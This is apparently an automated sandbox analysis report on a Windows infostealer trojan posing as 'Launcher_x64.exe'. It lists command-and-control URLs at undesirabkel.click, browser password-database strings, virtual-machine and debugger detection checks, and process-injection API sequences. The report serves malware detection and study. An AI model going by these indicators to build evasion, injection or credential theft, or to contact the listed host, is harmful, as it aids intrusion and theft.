Source: Launcher_x64.exe, 00000003.00000003.1694184499.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1736461523.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694007683.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Launcher_x64.exe, 00000003.00000003.1694007683.0000000005745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Launcher_x64.exe, 00000003.00000003.1694184499.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1736461523.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694007683.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Launcher_x64.exe, 00000003.00000003.1694007683.0000000005745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1749472584.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969150771.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1858070842.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1792574881.000000000571A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/
Source: Launcher_x64.exe, 00000003.00000003.1749740558.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750224448.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750974693.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750055715.000000000571A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/((j
Source: Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/.?
Source: Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/4
Source: Launcher_x64.exe, 00000003.00000002.2902244222.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/A
Source: Launcher_x64.exe, 00000003.00000003.1749472584.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835312617.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1858167471.000000000571B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835630979.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826186870.0000000005715000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/api
Source: Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1794626205.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1793149775.0000000003063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apiH
Source: Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1794626205.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1793149775.0000000003063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apis0
Source: Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apite
Source: Launcher_x64.exe, 00000003.00000002.2902316169.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969092084.000000000300E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apiw
Source: Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/f?
Source: Launcher_x64.exe, 00000003.00000003.1736528894.0000000005716000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835312617.0000000003005000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click:443/api
Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D7EA8E	0_2_00D7EA8E
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D73440	0_2_00D73440
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D6DDE2	0_2_00D6DDE2
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D80502	0_2_00D80502
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D696DB	0_2_00D696DB
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D7EA8E	2_2_00D7EA8E
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D73440	2_2_00D73440
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D6DDE2	2_2_00D6DDE2
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D80502	2_2_00D80502
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D696DB	2_2_00D696DB

Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: String function: 00D7670D appears 34 times
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: String function: 00D69BF0 appears 94 times
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: String function: 00D71D28 appears 42 times

Source: Launcher_x64.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Launcher_x64.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003260588842975
Source: Launcher_x64.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003260588842975

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/0@1/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03

Source: Launcher_x64.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Launcher_x64.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Launcher_x64.exe, 00000003.00000003.1693474886.0000000005749000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694099327.0000000005715000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Launcher_x64.exe

File read: C:\Users\user\Desktop\Launcher_x64.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
Source: C:\Users\user\Desktop\Launcher_x64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Launcher_x64.exe	Process created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
Source: C:\Users\user\Desktop\Launcher_x64.exe	Process created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
Source: C:\Users\user\Desktop\Launcher_x64.exe	Process created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Process created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Launcher_x64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Launcher_x64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Launcher_x64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Launcher_x64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Launcher_x64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D69DAA push ecx; ret	0_2_00D69DBD
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D69DAA push ecx; ret	2_2_00D69DBD
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301C319 push ecx; ret	3_3_0301C31A
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301C319 push ecx; ret	3_3_0301C31A
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301C319 push ecx; ret	3_3_0301C31A
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301C319 push ecx; ret	3_3_0301C31A
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301C319 push ecx; ret	3_3_0301C31A
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF4F push eax; iretd	3_3_0301CF55
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF4F push eax; iretd	3_3_0301CF55
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF4F push eax; iretd	3_3_0301CF55
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF4F push eax; iretd	3_3_0301CF55
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF4F push eax; iretd	3_3_0301CF55
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF5F pushad ; iretd	3_3_0301CF65
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF5F pushad ; iretd	3_3_0301CF65
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF5F pushad ; iretd	3_3_0301CF65
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF5F pushad ; iretd	3_3_0301CF65
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF5F pushad ; iretd	3_3_0301CF65
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF67 push 700301CFh; iretd	3_3_0301CF71
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF67 push 700301CFh; iretd	3_3_0301CF71
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF67 push 700301CFh; iretd	3_3_0301CF71
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF67 push 700301CFh; iretd	3_3_0301CF71
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CF67 push 700301CFh; iretd	3_3_0301CF71
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301E371 push ebp; retf	3_3_0301E372
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301E371 push ebp; retf	3_3_0301E372
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301E371 push ebp; retf	3_3_0301E372
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301E371 push ebp; retf	3_3_0301E372
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301E371 push ebp; retf	3_3_0301E372
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CA77 pushad ; retf	3_3_0301CAC1
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CA77 pushad ; retf	3_3_0301CAC1
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CA77 pushad ; retf	3_3_0301CAC1
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 3_3_0301CA77 pushad ; retf	3_3_0301CAC1

Source: C:\Users\user\Desktop\Launcher_x64.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Launcher_x64.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Launcher_x64.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Launcher_x64.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Launcher_x64.exe

Window / User API: threadDelayed 6337

Jump to behavior

Source: C:\Users\user\Desktop\Launcher_x64.exe TID: 7392	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe TID: 7664	Thread sleep count: 6337 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Launcher_x64.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Launcher_x64.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Launcher_x64.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D7B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00D7B799
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D7B6E8 FindFirstFileExW,	2_2_00D7B6E8
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D7B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00D7B799

Source: Launcher_x64.exe, Launcher_x64.exe, 00000003.00000003.1793226987.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902316169.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969092084.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902182465.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835312617.000000000300E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Launcher_x64.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Launcher_x64.exe

Code function: 0_2_00D69A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00D69A73

Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D9019E mov edi, dword ptr fs:[00000030h]	0_2_00D9019E
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D61BA0 mov edi, dword ptr fs:[00000030h]	0_2_00D61BA0
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D61BA0 mov edi, dword ptr fs:[00000030h]	2_2_00D61BA0

Source: C:\Users\user\Desktop\Launcher_x64.exe

Code function: 0_2_00D77020 GetProcessHeap,

0_2_00D77020

Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D69A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D69A73
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D69A67 SetUnhandledExceptionFilter,	0_2_00D69A67
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D71A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D71A60
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D696B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00D696B3
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D69A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00D69A73
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D69A67 SetUnhandledExceptionFilter,	2_2_00D69A67
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D71A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00D71A60
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D696B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00D696B3

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Launcher_x64.exe

Code function: 0_2_00D9019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00D9019E

Injects a PE file into a foreign processes

